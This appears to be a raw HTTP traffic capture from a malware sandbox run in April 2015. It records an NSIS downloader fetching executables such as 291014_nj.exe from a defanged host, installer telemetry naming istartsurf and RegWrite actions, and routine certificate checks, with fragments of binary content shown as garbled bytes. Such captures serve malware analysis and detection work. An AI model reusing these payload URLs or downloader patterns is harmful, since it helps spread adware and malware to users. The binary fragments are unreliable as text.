.}.F.E.u..H.....>B..H.P.u..u..u...Hr@..B...SV.5.>B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h.6B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[..

<<< skipped >>>

GET /310714d/291014_nj.exe?g3CvT78vSMa0N0LPai7Qvt=g3CvT78vSMa0N0LPai7Qvt HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: VVV.4threquest.me

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx/1.0.15

Date: Thu, 30 Apr 2015 23:07:47 GMT

Content-Type: application/force-download

Connection: keep-alive

X-Powered-By: PHP/5.4.30

Content-Length: 1985320

Content-Description: File Transfer

Content-Disposition: attachment; filename="291014_nj.exe"

Access-Control-Allow-Origin: *

Access-Control-Allow-Headers: X-Requested-With

X-Cache: BYPASS

CC: UA

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................\..........<2.......p....@..........................................................................s..........h............................................................................p...............................text...ZZ.......\.................. ..`.rdata.......p.......`..............@..@.data................r..............@....ndata.......@...........................rsrc...h............v..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....>B..H.P.u..u..u...Hr@..B...SV.5.>B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h.6B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[..

<<< skipped >>>

GET /310714d/310714_gs.exe?g3CvT78vSMa0N0LPai7Qvt=g3CvT78vSMa0N0LPai7Qvt HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: VVV.4threquest.me

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx/1.0.15

Date: Thu, 30 Apr 2015 23:07:47 GMT

Content-Type: application/octet-stream

Content-Length: 1112422

Last-Modified: Thu, 30 Apr 2015 23:07:02 GMT

Connection: keep-alive

Access-Control-Allow-Origin: *

Access-Control-Allow-Headers: X-Requested-With

CC: UA

Accept-Ranges: bytes

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................\..........<2.......p....@..........................................................................s..........H............................................................................p...............................text...ZZ.......\.................. ..`.rdata.......p.......`..............@..@.data................r..............@....ndata.......@...........................rsrc...H............v..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....>B..H.P.u..u..u...Hr@..B...SV.5.>B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h.6B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[..

<<< skipped >>>

GET /010914s/verificar_ip.php HTTP/1.1

Accept: */*

Referer: hXXp://VVV.4threquest.me/010914s/010914i.htm

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)

Host: VVV.4threquest.me

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.0.15

Date: Thu, 30 Apr 2015 23:07:48 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.4.30

Access-Control-Allow-Origin: *

Access-Control-Allow-Headers: X-Requested-With

X-Cache: BYPASS

CC: UA

Content-Encoding: gzip

18............s.......X.......0..

GET /img/Global/Yes_Button.png HTTP/1.1

Accept: */*

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)

Host: img.beyabir.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.4.7

Date: Thu, 30 Apr 2015 23:07:08 GMT

Content-Type: image/png

Content-Length: 1091

Connection: keep-alive

x-amz-id-2: FufJylo2h0LlgAvBhv6FKeS8RiEbjEd6iaXEFUTvT/OyG ZgeEaS5ooHNe8/F0Le

x-amz-request-id: 69875246E7628FFF

x-amz-meta-s3fox-filesize: 1091

x-amz-meta-s3fox-modifiedtime: 1380713503006

Last-Modified: Wed, 13 Nov 2013 16:12:48 GMT

x-amz-version-id: .ffwqW.8iCK2_zdeBNvgWdy.OnUDjeHF

ETag: "3f27a393967d84f83a317f40351c0065"

Accept-Ranges: bytes

.PNG........IHDR...T.........d.......tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:2D2B0E0924EA11E392EFCCF1BDECC388" xmpMM:DocumentID="xmp.did:2D2B0E0A24EA11E392EFCCF1BDECC388"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:2D2B0E0724EA11E392EFCCF1BDECC388" stRef:documentID="xmp.did:2D2B0E0824EA11E392EFCCF1BDECC388"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..&X....IDATx...1..0.E.......... .d.6\.&.NDH.v....9.{....)...D$k...O...T.[Sl.I....K.....S3..fB...2?w.....2...../=#.3.E(B...E(B...E( ...E(..Z..f..)U..l9.....7...........I..w...).u*..P#G...?...%....\.l....IEND.B`.....

<<< skipped >>>

GET /img/Global/Yes_Button_Hover.png HTTP/1.1

Accept: */*

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)

Host: img.beyabir.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.4.7

Date: Thu, 30 Apr 2015 23:07:08 GMT

Content-Type: image/png

Content-Length: 1094

Connection: keep-alive

x-amz-id-2: ZH/H/BrlB90f12Jgses7dcqPxryj5NnMS0cI2SxwLBB85Qfj2OXlGAsGTEDmcFC7

x-amz-request-id: 91A6ABE35D0A7569

x-amz-meta-s3fox-filesize: 1094

x-amz-meta-s3fox-modifiedtime: 1380713503000

Last-Modified: Wed, 13 Nov 2013 16:12:44 GMT

x-amz-version-id: L9RQqPthtuNtMC55hxM9o_RZqWXqZtid

ETag: "aec475b9d6280598800f3ceafea4af8c"

Accept-Ranges: bytes

.PNG........IHDR...T.........d.......tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:30B2AE2724EA11E392EFCCF1BDECC388" xmpMM:DocumentID="xmp.did:30B2AE2824EA11E392EFCCF1BDECC388"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:30B2AE2524EA11E392EFCCF1BDECC388" stRef:documentID="xmp.did:30B2AE2624EA11E392EFCCF1BDECC388"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>. ,.....IDATx......0.E..D....@L.^L...!...2...........=.....vq?.H.l4[.v..d.S.l......x..W{=..k...L(..3.....k.s..3...K....B..P..B..P@(B...E(B..u.f4.3..)e..l9z.i.?o..7.7M.....%...y..$.:.tA..K........S..^/......IEND.B`.....

<<< skipped >>>

GET /img/Global/No_Button_Hover.png HTTP/1.1

Accept: */*

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)

Host: img.beyabir.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.4.7

Date: Thu, 30 Apr 2015 23:07:08 GMT

Content-Type: image/png

Content-Length: 1091

Connection: keep-alive

x-amz-id-2: w8MZLmVYoBIXBjhf7AX2 gI11HEATjoL7xzl5WiqPif2jl7PuO2tfCE3vWAz3tzG

x-amz-request-id: E9FC3602133605A0

x-amz-meta-s3fox-filesize: 1091

x-amz-meta-s3fox-modifiedtime: 1380713503004

Last-Modified: Wed, 13 Nov 2013 16:12:47 GMT

x-amz-version-id: wNmfJwpUmazhRatL.BZxBG0x.XZldhEV

ETag: "6d55a62314755c1454569b2b098a3a9f"

Accept-Ranges: bytes

.PNG........IHDR...T.........d.......tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:30B2AE2324EA11E392EFCCF1BDECC388" xmpMM:DocumentID="xmp.did:30B2AE2424EA11E392EFCCF1BDECC388"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:30B2AE2124EA11E392EFCCF1BDECC388" stRef:documentID="xmp.did:30B2AE2224EA11E392EFCCF1BDECC388"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>........IDATx...1..0.E........8A9?=..h'.NDH.v..b $.{....)...D$j...O;.v...I6....../.s.....f....2.>.......1..?........ ...E( ....."...P."..PWhFC1...R.N...g......~.9h..~*.\.Q..3l'.....B.\.W...`.............IEND.B`.....

<<< skipped >>>

GET /img/Rerarapepe/logo.png HTTP/1.1

Accept: */*

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)

Host: img.beyabir.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.4.7

Date: Thu, 30 Apr 2015 23:07:08 GMT

Content-Type: image/png

Content-Length: 10944

Connection: keep-alive

x-amz-id-2: fttMRbWgO3QO0vLVbufMGrfOzBMWbPdneAkQOk8G/aPTYMrgBtiQS33MCTm hCu0

x-amz-request-id: 1D23872D552BD286

x-amz-meta-s3fox-filesize: 10944

x-amz-meta-s3fox-modifiedtime: 1384099835051

Last-Modified: Tue, 12 Nov 2013 11:05:48 GMT

x-amz-version-id: bDPFTNRsfueKXbAbmeVgRbPvzBoRvTw2

ETag: "0440e25b659207aaea00512d9a0a9924"

Accept-Ranges: bytes

.PNG........IHDR...L...^...........*.IDATx....T.....M...F."b.....F.Q....{.%..{E.........{.H....J.~*.....gN..j....._.Z..g..ff.....9C."..t:]'.F3-55uOjZz.......o....\...'....&J4[O*.=i.`%Y...................E.".....Z.>.69%;6.....HNIEFf&.J.,..r~..}.p).....e..V...3./)....A\|.............. k,Q...M..B..h....../..N........#..!V.P.y'X4J...v...Z...o.{ ''....L9....M.....7...l....Ml..SS..........$..C!.3.\...........A.'.......m_..%x...."@....)V%.?|WX...Y\.C.c.r.V..R....g...:.\2....4..M.R9X..b...b......,.U..t.b...Z...P..Q*......7.......t.B.{....@jY!.....Q......Tdk...3;...s..0... ....@.&..m.ktE.f. I.M..1...`..V..d[.9..qG.&".U..C..u...W.C{..4'..v?.....\..>......h<.C{.(4...u...G..E=Gvj..7[.?.:.?.K.9...e..s........,--=....[W'...v......R....^<...!..]........>..j........].v.....j.v..l.j.V.wn.j.&(I.][.r...Q.x..>....Hay...99f..;.%..R..Q_...h4Sy...a]....J.dQ..o........... 9...8.2Br..)...a)w..]...h.f.K.}#i.T[.......u..(.;.....d=....,..{....Z..._.Q..t:... ..H.R..Wt.f^...'6.Xu.\.DU*...u.oAK....&KQ.# .%.Q..f......{34.-.>.M............6'(.8@.y..Z.......$.UP:...i.../..5....V:..\...@.m'@B.:..f.\..,......17.......&.Qn..t..DJ.~w..z.j..........e.Q......&..tX...s.5s*..OA...HY......c...d@. .\.B..n9i..k.@.j.m[)...!h..P..r..,A...A..b......O.Oyr.i..".*....m.EA8...r....T.6H.DP.....n.y=4.LG..1m2N.n.G.rX..........?.....5%mp.A=...H@.C.a5.k.J.V/....J.r!..W.t..r.#Y..J.g.c...{.H,N...>r..lY.'.4.....m.....D.t..YT.d. hN..P.K`.....%\..a-..~....l..s....?...5....8..P... ......5.............3u"...#s..(....7@R,.....Es.9..(...m#k.8...tiP..

<<< skipped >>>

GET /img/Rerarapepe/Rerarapepe3.jpg HTTP/1.1

Accept: */*

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)

Host: img.beyabir.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.4.7

Date: Thu, 30 Apr 2015 23:07:08 GMT

Content-Type: image/jpeg

Content-Length: 15799

Connection: keep-alive

x-amz-id-2: v/KJyRQPRqGzp68fMREpMsXVlN8ZGENjPJZ3xLLc6RX9mf6LfR53urxF4AogH8OE

x-amz-request-id: 10317CBB850CD0F8

x-amz-meta-s3fox-filesize: 15799

x-amz-meta-s3fox-modifiedtime: 1394538949746

Last-Modified: Tue, 11 Mar 2014 11:56:45 GMT

x-amz-version-id: zPl9IpmeaG3ff3qZpgvUQzMtoydG8QKH

ETag: "3e2809731062d36b6ae81e70aef3b785"

Accept-Ranges: bytes

......Exif..II*.................Ducky.......<.....ohXXp://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:F7DDEC055CA8E311B43CF856625B69D6" xmpMM:DocumentID="xmp.did:08AEC486A91411E3A978EB316F7617DC" xmpMM:InstanceID="xmp.iid:08AEC485A91411E3A978EB316F7617DC" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:B1126B7673A8E311B43CF856625B69D6" stRef:documentID="xmp.did:F7DDEC055CA8E311B43CF856625B69D6"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...................................................................................................................................................0........................................................................................!..1A..Qaq"..2R.......r.#S.T.B.$4..3s...bCdt%U....c......................!1..AQ...aq..."2R......b3..B.r................?..J. ..U.@@@@@@@A...."... .a..... ..U.@@@A.A.]A....Dq.....p:QS...C.u.....|OZ...D<GZ...@..h.#.....E_....:......:.<GZ...A..Z*...C.u.x.......:.e..27...EwQ..z........

<<< skipped >>>

GET /img/Rerarapepe/Rerarapepe_b.png HTTP/1.1

Accept: */*

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)

Host: img.beyabir.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.4.7

Date: Thu, 30 Apr 2015 23:07:08 GMT

Content-Type: image/png

Content-Length: 5163

Connection: keep-alive

x-amz-id-2: AjQL4y8fLzMBXjBcq1riQXu6lrQMz5eIxeZcrvBO8swbGl1434gYRzLcefkTkD6R

x-amz-request-id: D515F0C8C6C1D704

x-amz-meta-s3fox-filesize: 5163

x-amz-meta-s3fox-modifiedtime: 1402217717749

Last-Modified: Mon, 09 Jun 2014 14:41:12 GMT

x-amz-version-id: KNAPX8e2AxH1Bx9jEBmu7jKCGa_97Tvk

ETag: "297eebd38313ee5b5ce0639f28ef2690"

Accept-Ranges: bytes

..2u..wJ0..0..1p..OO...j....u.`{..'.,.4...........m......&......0...p..O|f.s.....W<....v.5..]....{v....S....>..m..n}.cW7....^....].a.y....K.wR#q.........i\.C.>........%.e1>1..C..~...`.#.|....{w..t...%l"?..."......#...ft..Wt.;3|.-.J&..Mj.T]..[...S....x.5O.f.S.o.. I^.....Y.)......l.....6K.q.Jy~{R...t..z....d,........N.Nj...... Y... ....D...K...C......7p...V?.j..^..kH.i..G7.3...u..(.#..i..`....2 V....D...w..?.Wt .k.b.n.H.1..l4...p..U.T~.....T.@v.... ....iJ.f\C..O........-........<V...W.K.....\...7Qu.ny.5.N..ZE...|..f"...e.... R. .ha....e...5.O.O#LiV..F..q..ws...!.o...x.Gj.....LP..l..C'z.|.....t...(....!.RE.t..1yx{.$_..../i....E...I.a.......DL.>s.........R 0.E..R.1.Q...D..m=@...N8...R..|.v-?N...c9,..V-S6o2~..`.5.tk...f...v..<.0(..1.T...n..7...y.i.r... .._.P..c......IEND.B`...2u..wJ0..0..1p..OO...j....u.`{..'.,.4...........m......&......0...p..O|f.s.....W<....v.5..]....{v....S....>..m..n}.cW7....^....].a.y....K.wR#q.........i\.C.>........%.e1>1..C..~...`.#.|....{w..t...%l"?..."......#...ft..Wt.;3|.-.J&..Mj.T]..[...S....x.5O.f.S.o.. I^.....Y.)......l.....6K.q.Jy~{R...t..z....d,........N.Nj...... Y... ....D...K...C......7p...V?.j..^..kH.i..G7.3...u..(.#..i..`....2 V....D...w..?.Wt .k.b.n.H.1..l4...p..U.T~.....T.@v.... ....iJ.f\C..O........-........<V...W.K.....\...7Qu.ny.5.N..ZE...|..f"...e.... R. .ha....e...5.O.O#LiV..F..q..ws...!.o...x.Gj.....LP..l..C'z.|.....t...(....!.RE.t..1yx{.$_..../i....E...I.a.......DL.>s.........R 0.E..R.1.Q...D..m=@...N8...R..|.v-?N...c9,..V-S6o2~..`.5

<<< skipped >>>

GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab?e38c9f6a9f564146 HTTP/1.1

Connection: Keep-Alive

Accept: */*

If-Modified-Since: Tue, 24 Feb 2015 00:37:01 GMT

If-None-Match: "80b4d90ca4fd01:0"

User-Agent: Microsoft-CryptoAPI/6.1

Host: ctldl.windowsupdate.com

HTTP/1.1 304 Not Modified

Content-Type: application/octet-stream

Last-Modified: Tue, 24 Feb 2015 00:37:01 GMT

ETag: "80b4d90ca4fd01:0"

Cache-Control: max-age=604800

Date: Thu, 30 Apr 2015 23:11:47 GMT

Connection: keep-alive

HTTP/1.1 304 Not Modified..Content-Type: application/octet-stream..Last-Modified: Tue, 24 Feb 2015 00:37:01 GMT..ETag: "80b4d90ca4fd01:0"..Cache-Control: max-age=604800..Date: Thu, 30 Apr 2015 23:11:47 GMT..Connection: keep-alive..

GET /v4/sof-installer/535559167_198339_B48A115F?action=pcm.installer.istartsurf.ClearnC HTTP/1.1

Connection: Keep-Alive

User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926

Host: xa.xingcloud.com

HTTP/1.1 200 OK

Server: nginx/0.7.67

Date: Thu, 30 Apr 2015 23:07:33 GMT

Content-Type: text/html; charset=utf-8

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.3.3

xa-api-version: v4

48..{"stats":"ok","time":"0.62 ms","message":"store 1 action and 0 update "}..0..HTTP/1.1 200 OK..Server: nginx/0.7.67..Date: Thu, 30 Apr 2015 23:07:33 GMT..Content-Type: text/html; charset=utf-8..Transfer-Encoding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.3.3..xa-api-version: v4..48..{"stats":"ok","time":"0.62 ms","message":"store 1 action and 0 update "}..0......

GET /v4/sof-installer/535559167_198339_B48A115F?action=pcm.installer.istartsurf.wpm HTTP/1.1

Connection: Keep-Alive

User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926

Host: xa.xingcloud.com

HTTP/1.1 200 OK

Server: nginx/0.7.67

Date: Thu, 30 Apr 2015 23:07:34 GMT

Content-Type: text/html; charset=utf-8

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.3.3

xa-api-version: v4

48..{"stats":"ok","time":"0.74 ms","message":"store 1 action and 0 update "}..0..HTTP/1.1 200 OK..Server: nginx/0.7.67..Date: Thu, 30 Apr 2015 23:07:34 GMT..Content-Type: text/html; charset=utf-8..Transfer-Encoding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.3.3..xa-api-version: v4..48..{"stats":"ok","time":"0.74 ms","message":"store 1 action and 0 update "}..0......

GET /v4/sof-installer/535559167_198339_B48A115F?action=pcm.installer.istartsurf.ient HTTP/1.1

Connection: Keep-Alive

User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926

Host: xa.xingcloud.com

HTTP/1.1 200 OK

Server: nginx/0.7.67

Date: Thu, 30 Apr 2015 23:07:38 GMT

Content-Type: text/html; charset=utf-8

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.3.3

xa-api-version: v4

48..{"stats":"ok","time":"0.42 ms","message":"store 1 action and 0 update "}..0..HTTP/1.1 200 OK..Server: nginx/0.7.67..Date: Thu, 30 Apr 2015 23:07:38 GMT..Content-Type: text/html; charset=utf-8..Transfer-Encoding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.3.3..xa-api-version: v4..48..{"stats":"ok","time":"0.42 ms","message":"store 1 action and 0 update "}..0..

GET /v4/sof-installer/535559167_198339_B48A115F?action=pcm.installer.istartsurf.RegWrite HTTP/1.1

Connection: Keep-Alive

User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926

Host: xa.xingcloud.com

HTTP/1.1 200 OK

Server: nginx/0.7.67

Date: Thu, 30 Apr 2015 23:07:39 GMT

Content-Type: text/html; charset=utf-8

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.3.3

xa-api-version: v4

48..{"stats":"ok","time":"1.66 ms","message":"store 1 action and 0 update "}..0..

GET //MEgwRjBEMEIwQDAJBgUrDgMCGgUABBS2CA1fbGt26xPkOKX4ZguoUjM0TgQUQMK9J47MNIMwojPX+2yz8LQsgM4CBwQSlx3KmUs= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.godaddy.com

HTTP/1.1 200 OK

Date: Thu, 30 Apr 2015 23:11:53 GMT

Server: Apache

Content-Transfer-Encoding: Binary

Cache-Control: max-age=122104, public, no-transform, must-revalidate

Last-Modified: Thu, 30 Apr 2015 22:54:04 GMT

Expires: Sat, 02 May 2015 10:54:04 GMT

ETag: "f8b69e2088ce500f8a2cd23376edbe2b1529a5ce"

Content-Length: 1810

Connection: close

Content-Type: application/ocsp-response

0..........0..... .....0......0...0....z0x1.0...U....US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy Inc.1 0)..U..."Go Daddy Validation Authority - G2..20150430225404Z0..0~0@0... ..........._lkv...8..f..R34N..@..'..4.0.3..l...,..........K....20150301022209Z.......20150430225404Z....20150502105404Z0...*.H.............B......&.e..<.>/x......Gj.w..-.w.~#...8[..p.........U.........r....8.-....M....U8.EE....x&..^.6...c..W.I:.b......t..L...!>.K......=q.@..... ...m.F.Er..pK.........fB.Y..-..H.....'T%..*.D...Ij..k..................p.i...Q.|!545........"....~.. .'...T....../s!....0...0...0..........,.z.Hl..0...*.H........0..1.0...U....US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy.com, Inc.1-0 ..U...$hXXp://certs.godaddy.com/repository/1301..U...*Go Daddy Secure Certificate Authority - G20...150316070000Z..160316070000Z0x1.0...U....US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy Inc.1 0)..U..."Go Daddy Validation Authority - G20.."0...*.H.............0.........xo(....QQ.`L.~...&...a.F.=.....d=....."......?...\..........b.D....l=.HS.N......A..;....C)...(..T........XA-N....k1 .....ag...,4.L{.I..hEKb..K......!.(...7....p.O...X.._........8.B..k[4...........e.../....^.S..7A.b.oB..\......2%.|c...A....Fk.T..24.0B...p..........0...0...U.......0.0...U...........0...U.%..0... ......... .......0...U.......O........f...e..r..0... .....0......0L..U...E0C0A.?.=.;hXXp://crl.godaddy.com/repository/mastergodaddy2issuing.crl0J..U. .C0A0?..`.H...m....000... ........"hXXp://crl.godaddy.com/repo

<<< skipped >>>

GET /msdownload/update/v3/static/trustedr/en/47BEABC922EAE80E78783462A79F45C254FDE68B.crt?daa3db62222adfef HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ctldl.windowsupdate.com

HTTP/1.1 200 OK

Content-Type: application/x-x509-ca-cert

Last-Modified: Fri, 20 Feb 2015 20:14:50 GMT

Accept-Ranges: bytes

ETag: "05934e1494dd01:0"

Server: Microsoft-IIS/8.5

X-Powered-By: ASP.NET

X-Powered-By: ARR/2.5

X-Powered-By: ASP.NET

Content-Length: 969

Date: Thu, 30 Apr 2015 23:11:51 GMT

Connection: keep-alive

0...0...........0...*.H........0..1.0...U....US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy.com, Inc.110/..U...(Go Daddy Root Certificate Authority - G20...090901000000Z..371231235959Z0..1.0...U....US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy.com, Inc.110/..U...(Go Daddy Root Certificate Authority - G20.."0...*.H.............0.........qb...Y4.......IX.".... C.;....I.'....N...p..2...>.N...O/Y0"...Vk......u.9Q{..5.tN......?........j..............;F|2...f"..im6.......`.8......F...>.]|.|.. S..biQ%.a.D..,.C.#..:...)....]....0.9.....K].2..bC%4.V'...;p*?n.....}....Sm`..,.X.._F.....<..I1\iF..G......B0@0...U.......0....0...U...........0...U......:....g(.....An .....0...*.H...............]y...Yg.a.~;.1u-. .Oe......../..Z..t.s.8B..{..u...........S.~.F..... ....'....Z.7....l....=.$Oy.5._.......-.......s@.r%......h..W...:...D...7...2..8..d.,~........h..".8-z..T.i._3.z={...._9..u..v.3.,./L.....O...JT...}......~...^....C..M..k...e.z...D.\....HTTP/1.1 200 OK..Content-Type: application/x-x509-ca-cert..Last-Modified: Fri, 20 Feb 2015 20:14:50 GMT..Accept-Ranges: bytes..ETag: "05934e1494dd01:0"..Server: Microsoft-IIS/8.5..X-Powered-By: ASP.NET..X-Powered-By: ARR/2.5..X-Powered-By: ASP.NET..Content-Length: 969..Date: Thu, 30 Apr 2015 23:11:51 GMT..Connection: 